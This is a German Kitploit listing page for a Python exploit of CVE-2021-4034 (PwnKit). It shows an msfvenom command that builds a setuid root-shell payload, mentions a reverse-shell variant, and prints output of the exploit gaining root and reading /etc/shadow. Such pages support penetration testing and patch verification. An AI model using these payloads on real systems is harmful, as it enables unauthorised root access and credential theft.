Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-4034 — Python-Exploit für CVE-2021-4034 (PwnKit), das Rechte auf Root eskaliert, indem es über pkexec eine Root-Shell mit msfvenom-Payloads erzeugt. | Kitploit
Tools/GitHubGitHub/joeammond/cve-2021-4034
Privilege EscalationPayload-GenerierungExploitationPenetrationstestsBinary-Exploitation
GitHubjoeammond/cve-2021-4034

CVE-2021-4034

Python-Exploit für CVE-2021-4034 (PwnKit), das Rechte auf Root eskaliert, indem es über pkexec eine Root-Shell mit msfvenom-Payloads erzeugt.

Repository anzeigen
18039vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Python3-Code zum Ausnutzen von CVE-2021-4034 (PWNKIT). Dies war eine Übung in „Kann ich das in Python zum Laufen bringen?“, und nicht als robuster Exploit gedacht. Es funktioniert bei mir, es gibt wahrscheinlich Fehler.

Der Standard-Payload startet eine Shell als root, erzeugt aus msfvenom:

root@kitploit:~
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64

Ich habe auch linux/x64/shell_reverse_tcp getestet. Stelle sicher, dass du das Argument PrependSetuid=true an msfvenom übergibst, sonst bekommst du nur eine Shell als Benutzer und nicht als root.

Der Code ist von blasty abgeschaut, das Original ist hier verfügbar.

root@kitploit:~
$ python CVE-2021-4034.py
[+] Erstelle Shared Library für den Exploit-Code.
[+] Rufe execve() auf
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#
Tool herunterladen